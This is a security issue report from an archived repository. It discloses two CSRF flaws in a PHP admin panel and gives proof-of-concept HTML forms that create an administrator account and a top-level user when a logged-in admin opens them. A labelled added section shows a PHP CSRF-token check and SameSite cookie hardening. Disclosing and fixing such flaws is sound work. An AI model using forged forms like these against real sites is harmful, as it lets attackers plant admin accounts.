This repository was archived by the owner on Apr 14, 2021. It is now read-only.
There are two CSRF vulnerabilities that can add an administrator account #20
Closed
Description
After the administrator has logged in, open the following two pages.
PoC:
add_admin.html
```html
<html>
<form action="http://127.0.0.1/admin.php?m=Admin&c=manager&a=add" method="post">
  <div class="form-group">
    <label>用户名</label>
    <input class="form-control" type="text" name="username" value="csrf">
  </div>
  <div class="form-group">
    <label>邮箱</label>
    <input class="form-control" type="text" name="email" value="csrf@test.com">
  </div>
  <div class="form-group">
    <label>密码</label>
    <input class="form-control" type="password" name="password" value="123456">
  </div>
  <div class="form-group">
    <label>确认密码</label>
    <input class="form-control" type="password" name="repassword" value="123456">
  </div>
  <div class="form-group">
    <button class="btn btn-success" type="submit" >添加</button>
  </div>
</form>
</html>
```
add_user.html
```html
<html>
<form action="http://127.0.0.1/admin.php?m=Admin&c=member&a=add" method="post">
  <div class="form-group">
    <label>用户名</label>
    <input class="form-control" type="text" name="username" value="test">
  </div>
  <div class="form-group">
    <label>邮箱</label>
    <input class="form-control" type="text" name="email" value="test@test.com">
  </div>
  <div class="form-group">
    <label>密码</label>
    <input class="form-control" type="password" name="password" value="123456">
  </div>
  <div class="form-group">
    <label>确认密码</label>
    <input class="form-control" type="password" name="repassword" value="123456">
  </div>
  <div class="form-group">
    <label>用户等级</label>
    <label class="radio-inline">
      <input type="radio" name="type" id="type" value="1" >路人
    </label>
    <label class="radio-inline">
      <input type="radio" name="type" id="type" value="2" >实习白帽子
    </label>
    <label class="radio-inline">
      <input type="radio" name="type" id="type" value="3" >普通白帽子
    </label>
    <label class="radio-inline">
      <input type="radio" name="type" id="type" checked="checked" value="4" >核心白帽子
    </label>
  </div>
  <div class="form-group">
    <label>用户状态</label>
    <label class="radio-inline">
      <input type="radio" name="status" id="status" value="0">禁止登陆
    </label>
    <label class="radio-inline">
      <input type="radio" name="status" id="status" value="1" checked="checked">正常
    </label>
  </div>
  <div class="form-group">
    <button class="btn btn-success" type="submit" >添加</button>
  </div>
</form>
</html>
```
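
A server-side check that would reject both forms above, shown as an added example that is not part of the original issue or the project's code: the handlers behind `a=add` would call `csrf_check()` before creating an account. The function names and the `csrf_token` field and session key are assumptions made for illustration; in a real handler the arrays passed in would be `$_POST` and `$_SESSION`.

```php
<?php
// Added example, not project code. Function names and the 'csrf_token'
// field/session key are hypothetical.

/** Return the per-session token, creating it on first use. */
function csrf_token(array &$session): string
{
    if (empty($session['csrf_token'])) {
        $session['csrf_token'] = bin2hex(random_bytes(32)); // 256-bit random value
    }
    return $session['csrf_token'];
}

/** Hidden field to embed in every state-changing admin form. */
function csrf_field(array &$session): string
{
    return '<input type="hidden" name="csrf_token" value="'
        . htmlspecialchars(csrf_token($session), ENT_QUOTES) . '">';
}

/** True only for a POST that carries the token stored in the session. */
function csrf_check(string $method, array $post, array $session): bool
{
    $sent     = $post['csrf_token'] ?? '';
    $expected = $session['csrf_token'] ?? '';
    return $method === 'POST'
        && is_string($sent) && is_string($expected) && $expected !== ''
        && hash_equals($expected, $sent); // constant-time comparison
}

// Constructed demonstration using the field names from add_admin.html.
$session = [];                        // stands in for $_SESSION
$token   = csrf_token($session);      // issued when the admin form is rendered

// Cross-site submission: the other origin cannot read the token, so it is absent.
$crossSite = ['username' => 'csrf', 'email' => 'csrf@test.com',
              'password' => '123456', 'repassword' => '123456'];

// Same fields submitted from the application's own form, token included.
$sameSite = $crossSite + ['csrf_token' => $token];

var_dump(csrf_check('POST', $crossSite, $session)); // request without token
var_dump(csrf_check('POST', $sameSite, $session));  // request with session token
var_dump(csrf_check('GET',  $sameSite, $session));  // state change over GET
```

Setting the session cookie with `SameSite=Lax` or `Strict` adds a second layer, since the browser then withholds the cookie on the cross-site POST these forms rely on.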